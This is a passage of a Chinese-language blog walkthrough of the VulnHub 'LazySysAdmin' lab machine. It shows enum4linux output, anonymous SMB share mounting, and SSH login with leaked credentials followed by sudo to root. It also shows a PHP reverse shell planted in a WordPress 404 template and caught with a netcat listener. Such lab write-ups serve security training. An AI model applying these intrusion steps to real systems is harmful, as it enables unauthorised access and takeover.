class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text=""></span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text=""></span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> <span class="cm-operator">==========================================</span> </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|    Share Enumeration on <span class="cm-number">192</span>.168.0.100    |</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> <span class="cm-operator">==========================================</span> </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">WARNING: The <span class="cm-string">"syslog"</span> option is deprecated</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text=""></span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text="   ">    </span>Sharename       Type      Comment</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text="   ">    </span><span class="cm-attribute">---------</span>       <span class="cm-attribute">----</span>      <span class="cm-attribute">-------</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text="    ">    </span>print<span class="cm-def">$ </span>         Disk      Printer Drivers</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text="  ">    </span>share<span class="cm-def">$ </span>         Disk      Sumshare</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text=" ">    </span>IPC<span class="cm-def">$ </span>           IPC       IPC Service (Web server)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Reconnecting with SMB1 <span class="cm-keyword">for</span> workgroup listing.</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text=""></span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text=" ">    </span>Server               Comment</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text="  ">    </span><span class="cm-attribute">---------</span>            <span class="cm-attribute">-------</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text=""></span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text="  ">    </span>Workgroup            Master</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text=" ">    </span><span class="cm-attribute">---------</span>            <span class="cm-attribute">-------</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text="   ">    </span>WORKGROUP            </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text=""></span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[<span class="cm-operator">+</span>] Attempting to map shares on <span class="cm-number">192</span>.168.0.100</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">//192.168.0.100/print<span class="cm-def">$<span class="cm-tab" role="presentation" cm-text="   ">  </span>Mapping</span>: DENIED, Listing: N/A</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">//192.168.0.100/share<span class="cm-def">$<span class="cm-tab" role="presentation" cm-text="    ">  </span>Mapping</span>: OK, Listing: OK</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">//192.168.0.100/IPC<span class="cm-def">$<span class="cm-tab" role="presentation" cm-text="   ">    </span></span>[E] Can<span class="cm-string">'t understand response:</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">WARNING: The <span class="cm-string">"syslog"</span> option is deprecated</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text=""></span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> <span class="cm-operator">=====================================================</span> </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|    Password Policy Information <span class="cm-keyword">for</span> <span class="cm-number">192</span>.168.0.100    |</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> <span class="cm-operator">=====================================================</span> </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text=""></span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text=""></span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[<span class="cm-operator">+</span>] Attaching to <span class="cm-number">192</span>.168.0.100 using a NULL share</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text=""></span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[<span class="cm-operator">+</span>] Trying protocol <span class="cm-number">445</span>/SMB...</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text=""></span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[<span class="cm-operator">+</span>] Found domain(s):</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text=""></span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text="  ">    </span>[<span class="cm-operator">+</span>] LAZYSYSADMIN</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text="    ">    </span>[<span class="cm-operator">+</span>] Builtin</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text=""></span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[<span class="cm-operator">+</span>] Password Info <span class="cm-keyword">for</span> Domain: LAZYSYSADMIN</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text=""></span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text="    ">    </span>[<span class="cm-operator">+</span>] Minimum password length: <span class="cm-number">5</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text="   ">    </span>[<span class="cm-operator">+</span>] Password history length: None</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text="   ">    </span>[<span class="cm-operator">+</span>] Maximum password age: Not Set</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text="   ">    </span>[<span class="cm-operator">+</span>] Password Complexity Flags: <span class="cm-number">000000</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text=""></span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text="   ">    </span><span class="cm-tab" role="presentation" cm-text=" ">    </span>[<span class="cm-operator">+</span>] Domain Refuse Password Change: <span class="cm-number">0</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text=" ">    </span><span class="cm-tab" role="presentation" cm-text=" ">    </span>[<span class="cm-operator">+</span>] Domain Password Store Cleartext: <span class="cm-number">0</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text="   ">    </span><span class="cm-tab" role="presentation" cm-text=" ">    </span>[<span class="cm-operator">+</span>] Domain Password Lockout Admins: <span class="cm-number">0</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text="    ">    </span><span class="cm-tab" role="presentation" cm-text=" ">    </span>[<span class="cm-operator">+</span>] Domain Password No Clear Change: <span class="cm-number">0</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text="   ">    </span><span class="cm-tab" role="presentation" cm-text=" ">    </span>[<span class="cm-operator">+</span>] Domain Password No Anon Change: <span class="cm-number">0</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text="    ">    </span><span class="cm-tab" role="presentation" cm-text=" ">    </span>[<span class="cm-operator">+</span>] Domain Password Complex: <span class="cm-number">0</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text=""></span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text="  ">    </span>[<span class="cm-operator">+</span>] Minimum password age: None</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text="  ">    </span>[<span class="cm-operator">+</span>] Reset Account Lockout Counter: <span class="cm-number">30</span> minutes </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text="   ">    </span>[<span class="cm-operator">+</span>] Locked Account Duration: <span class="cm-number">30</span> minutes </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text=" ">    </span>[<span class="cm-operator">+</span>] Account Lockout Threshold: None</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text=" ">    </span>[<span class="cm-operator">+</span>] Forced Log off Time: Not Set</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text=""></span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text=""></span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[<span class="cm-operator">+</span>] Retieved partial password policy with rpcclient:</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text=""></span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Password Complexity: Disabled</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Minimum Password Length: <span class="cm-number">5</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text=""></span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text=""></span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> <span class="cm-operator">===============================</span> </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|    Groups on <span class="cm-number">192</span>.168.0.100    |</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> <span class="cm-operator">===============================</span> </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text=""></span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[<span class="cm-operator">+</span>] Getting builtin groups:</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text=""></span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[<span class="cm-operator">+</span>] Getting builtin group memberships:</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text=""></span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[<span class="cm-operator">+</span>] Getting local groups:</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text=""></span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[<span class="cm-operator">+</span>] Getting local group memberships:</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text=""></span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[<span class="cm-operator">+</span>] Getting domain groups:</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text=""></span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[<span class="cm-operator">+</span>] Getting domain group memberships:</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text=""></span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> <span class="cm-operator">========================================================================</span> </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|    Users on <span class="cm-number">192</span>.168.0.100 via RID cycling (RIDS: <span class="cm-number">500</span><span class="cm-attribute">-550</span>,1000-1050)    |</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> <span class="cm-operator">========================================================================</span> </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[I] Found new SID: S-1-22-1</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[I] Found new SID: S-1-5-21-2952042175-1524911573-1237092750</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[I] Found new SID: S-1-5-32</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[<span class="cm-operator">+</span>] Enumerating users using SID S-1-5-32 and logon username <span class="cm-string">''</span>, password <span class="cm-string">''</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">S-1-5-32-500 *unknown*\*unknown* (8)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text=""></span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">S-1-5-32-544 BUILTIN\Administrators (Local Group)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">S-1-5-32-545 BUILTIN\Users (Local Group)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">S-1-5-32-546 BUILTIN\Guests (Local Group)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">S-1-5-32-547 BUILTIN\Power Users (Local Group)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">S-1-5-32-548 BUILTIN\Account Operators (Local Group)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">S-1-5-32-549 BUILTIN\Server Operators (Local Group)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">S-1-5-32-550 BUILTIN\Print Operators (Local Group)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">S-1-5-32-1000 *unknown*\*unknown* (8)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">S-1-5-32-1001 *unknown*\*unknown* (8)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text=""></span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[<span class="cm-operator">+</span>] Enumerating users using SID S-1-22-1 and logon username <span class="cm-string">''</span>, password <span class="cm-string">''</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">S-1-22-1-1000 Unix User\togie (Local User)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[<span class="cm-operator">+</span>] Enumerating users using SID S-1-5-21-2952042175-1524911573-1237092750 and logon username <span class="cm-string">''</span>, password <span class="cm-string">''</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">S-1-5-21-2952042175-1524911573-1237092750-500 *unknown*\*unknown* (8)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">S-1-5-21-2952042175-1524911573-1237092750-501 LAZYSYSADMIN\nobody (Local User)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text=""></span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">S-1-5-21-2952042175-1524911573-1237092750-512 *unknown*\*unknown* (8)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">S-1-5-21-2952042175-1524911573-1237092750-513 LAZYSYSADMIN\None (Domain Group)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">S-1-5-21-2952042175-1524911573-1237092750-514 *unknown*\*unknown* (8)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text=""></span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text=""></span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> <span class="cm-operator">==============================================</span> </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">|    Getting printer info <span class="cm-keyword">for</span> <span class="cm-number">192</span>.168.0.100    |</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> <span class="cm-operator">==============================================</span> </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">No printers returned.</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text=""></span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text=""></span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">enum4linux complete on Thu Feb  <span class="cm-number">1</span> <span class="cm-number">00</span>:46:33 <span class="cm-number">2018</span></span></pre></div></div></div></div></div><div style="position: absolute; height: 30px; width: 1px; border-bottom: 0px solid transparent; top: 4142px;"></div><div class="CodeMirror-gutters" style="display: none; height: 4172px;"></div></div></div></pre><p>windows下獲取共享資源</p><pre class="md-fences md-end-block" lang="bash"> <div class="CodeMirror cm-s-inner CodeMirror-wrap"><div style="overflow: hidden; position: relative; width: 3px; height: 0px; top: 4px; left: 4px;"></div><div class="CodeMirror-scrollbar-filler" cm-not-content="true"></div><div class="CodeMirror-gutter-filler" cm-not-content="true"></div><div class="CodeMirror-scroll" tabindex="-1"><div class="CodeMirror-sizer" style="margin-left: 0px; margin-bottom: 0px; border-right-width: 30px; padding-right: 0px; padding-bottom: 0px;"><div style="position: relative; top: 0px;"><div class="CodeMirror-lines" role="presentation"><div role="presentation" style="position: relative; outline: none;"><div class="CodeMirror-measure"><pre><span>xxxxxxxxxx</span></pre></div><div class="CodeMirror-measure"></div><div style="position: relative; z-index: 1;"></div><div class="CodeMirror-code" role="presentation"><div class="CodeMirror-activeline" style="position: relative;"><div class="CodeMirror-activeline-background CodeMirror-linebackground"></div><div class="CodeMirror-gutter-background CodeMirror-activeline-gutter" style="left: 0px; width: 0px;"></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">net use k: \\<span class="cm-number">192</span>.168.0.100\share<span class="cm-def">$</span></span></pre></div></div></div></div></div></div><div style="position: absolute; height: 30px; width: 1px; border-bottom: 0px solid transparent; top: 31px;"></div><div class="CodeMirror-gutters" style="display: none; height: 61px;"></div></div></div></pre><p>linux下獲取共享資源</p><pre class="md-fences md-end-block" lang="bash"> <div class="CodeMirror cm-s-inner CodeMirror-wrap"><div style="overflow: hidden; position: relative; width: 3px; height: 0px; top: 4px; left: 4px;"></div><div class="CodeMirror-scrollbar-filler" cm-not-content="true"></div><div class="CodeMirror-gutter-filler" cm-not-content="true"></div><div class="CodeMirror-scroll" tabindex="-1"><div class="CodeMirror-sizer" style="margin-left: 0px; margin-bottom: 0px; border-right-width: 30px; padding-right: 0px; padding-bottom: 0px;"><div style="position: relative; top: 0px;"><div class="CodeMirror-lines" role="presentation"><div role="presentation" style="position: relative; outline: none;"><div class="CodeMirror-measure"><pre><span>xxxxxxxxxx</span></pre></div><div class="CodeMirror-measure"></div><div style="position: relative; z-index: 1;"></div><div class="CodeMirror-code" role="presentation"><div class="CodeMirror-activeline" style="position: relative;"><div class="CodeMirror-activeline-background CodeMirror-linebackground"></div><div class="CodeMirror-gutter-background CodeMirror-activeline-gutter" style="left: 0px; width: 0px;"></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">mount <span class="cm-attribute">-t</span> cifs <span class="cm-attribute">-o</span> <span class="cm-def">username</span><span class="cm-operator">=</span><span class="cm-string">''</span><span class="cm-def">,password</span><span class="cm-operator">=</span><span class="cm-string">''</span> //192.168.0.100/share<span class="cm-def">$ </span>/mnt</span></pre></div></div></div></div></div></div><div style="position: absolute; height: 30px; width: 1px; border-bottom: 0px solid transparent; top: 31px;"></div><div class="CodeMirror-gutters" style="display: none; height: 61px;"></div></div></div></pre><p><img src='https://mochazz.github.io/img/vulnhub-LazySysAdmin/2.png' alt='2' referrerPolicy='no-referrer' /></p><p>發現兩個關鍵的文件deets.txt和wp-config.php</p><p><img src='https://mochazz.github.io/img/vulnhub-LazySysAdmin/3.png' alt='3' referrerPolicy='no-referrer' /></p><p><img src='https://mochazz.github.io/img/vulnhub-LazySysAdmin/4.png' alt='4' referrerPolicy='no-referrer' /></p><p>嘗試用上面獲取的mysql帳號密碼去登陸phpmyadmin，可是發現沒一個表項能夠查看。</p><p><img src='https://mochazz.github.io/img/vulnhub-LazySysAdmin/5.png' alt='5' referrerPolicy='no-referrer' /></p><p>另外，上面還有一個密碼是12345，並且以前登陸WordPress頁面的時候，頁面顯示<code>My name is togie.</code>，因此能夠用帳號：<code>togie</code> 密碼：<code>12345</code>嘗試登陸ssh，發現能夠成功登陸。</p><pre class="md-fences md-end-block" lang="bash"> <div class="CodeMirror cm-s-inner CodeMirror-wrap"><div style="overflow: hidden; position: relative; width: 3px; height: 0px; top: 4px; left: 4px;"></div><div class="CodeMirror-scrollbar-filler" cm-not-content="true"></div><div class="CodeMirror-gutter-filler" cm-not-content="true"></div><div class="CodeMirror-scroll" tabindex="-1"><div class="CodeMirror-sizer" style="margin-left: 0px; margin-bottom: 0px; border-right-width: 30px; padding-right: 0px; padding-bottom: 0px;"><div style="position: relative; top: 0px;"><div class="CodeMirror-lines" role="presentation"><div role="presentation" style="position: relative; outline: none;"><div class="CodeMirror-measure"><pre><span>xxxxxxxxxx</span></pre></div><div class="CodeMirror-measure"></div><div style="position: relative; z-index: 1;"></div><div class="CodeMirror-code" role="presentation" style=""><div class="CodeMirror-activeline" style="position: relative;"><div class="CodeMirror-activeline-background CodeMirror-linebackground"></div><div class="CodeMirror-gutter-background CodeMirror-activeline-gutter" style="left: 0px; width: 0px;"></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">togie@LazySysAdmin:~<span class="cm-def">$ whoami</span></span></pre></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">togie</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">togie@LazySysAdmin:~<span class="cm-def">$ id</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-def">uid</span><span class="cm-operator">=</span><span class="cm-number">1000</span>(togie) <span class="cm-def">gid</span><span class="cm-operator">=</span><span class="cm-number">1000</span>(togie) <span class="cm-def">groups</span><span class="cm-operator">=</span><span class="cm-number">1000</span>(togie),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lpadmin),111(sambashare)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">togie@LazySysAdmin:~<span class="cm-def">$ sudo</span> <span class="cm-builtin">su</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[sudo] password <span class="cm-keyword">for</span> togie: </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">root@LazySysAdmin:/home/togie<span class="cm-comment"># id</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-def">uid</span><span class="cm-operator">=</span><span class="cm-number">0</span>(root) <span class="cm-def">gid</span><span class="cm-operator">=</span><span class="cm-number">0</span>(root) <span class="cm-def">groups</span><span class="cm-operator">=</span><span class="cm-number">0</span>(root)</span></pre></div></div></div></div></div><div style="position: absolute; height: 30px; width: 1px; border-bottom: 0px solid transparent; top: 215px;"></div><div class="CodeMirror-gutters" style="display: none; height: 245px;"></div></div></div></pre><p>有了root權限，就有權限查看目標文件/root/proof.txt，這樣就算完成了整個遊戲了。這裏恰好togie有root權限，因此嘗試直接用sudo su切換到root權限，可是若是togie沒有root權限，就須要經過其餘方式來提權了。</p><h3><a name='header-n8459' class='md-header-anchor '></a>思路二</h3><p>經過帳號：<code>Admin</code> 密碼：<code>TogieMYSQL12345^^</code>登陸WordPress控制面板，向404.php頁面模板插入PHP反彈shell的代碼。</p><p><img src='https://mochazz.github.io/img/vulnhub-LazySysAdmin/7.png' alt='7' referrerPolicy='no-referrer' /></p><p>編輯好後，點擊下面的upload file應用，而後訪問<a href='http://192.168.0.100/wordpress/?p=2' target='_blank' class='url'>http://192.168.0.100/wordpress/?p=2</a></p><pre class="md-fences md-end-block" lang="bash" style="break-inside: unset;"> <div class="CodeMirror cm-s-inner CodeMirror-wrap"><div style="overflow: hidden; position: relative; width: 3px; height: 0px; top: 4px; left: 4px;"></div><div class="CodeMirror-scrollbar-filler" cm-not-content="true"></div><div class="CodeMirror-gutter-filler" cm-not-content="true"></div><div class="CodeMirror-scroll" tabindex="-1"><div class="CodeMirror-sizer" style="margin-left: 0px; margin-bottom: 0px; border-right-width: 30px; padding-right: 0px; padding-bottom: 0px;"><div style="position: relative; top: 0px;"><div class="CodeMirror-lines" role="presentation"><div role="presentation" style="position: relative; outline: none;"><div class="CodeMirror-measure"><pre><span>xxxxxxxxxx</span></pre></div><div class="CodeMirror-measure"></div><div style="position: relative; z-index: 1;"></div><div class="CodeMirror-code" role="presentation" style=""><div class="CodeMirror-activeline" style="position: relative;"><div class="CodeMirror-activeline-background CodeMirror-linebackground"></div><div class="CodeMirror-gutter-background CodeMirror-activeline-gutter" style="left: 0px; width: 0px;"></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">root@kali:~<span class="cm-comment"># nc -vlp 1234</span></span></pre></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">listening on [any] <span class="cm-number">1234</span> ...</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-number">192</span>.168.0.100: inverse host lookup failed: Unknown host</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">connect to [192.168.0.109] from (UNKNOWN) [192.168.0.100] <span class="cm-number">36468</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Linux LazySysAdmin <span class="cm-number">4</span>.4.0-31-generic <span class="cm-comment">#50~14.04.1-Ubuntu SMP Wed Jul 13 01:06:37 UTC 2016 i686 i686 i686 GNU/Linux</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> <span class="cm-number">16</span>:03:42 up <span class="cm-number">6</span> min,  <span class="cm-number">0</span> users,  load average: <span class="cm-number">0</span>.01, <span class="cm-number">0</span>.15, <span class="cm-number">0</span>.11</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-def">uid</span><span class="cm-operator">=</span><span 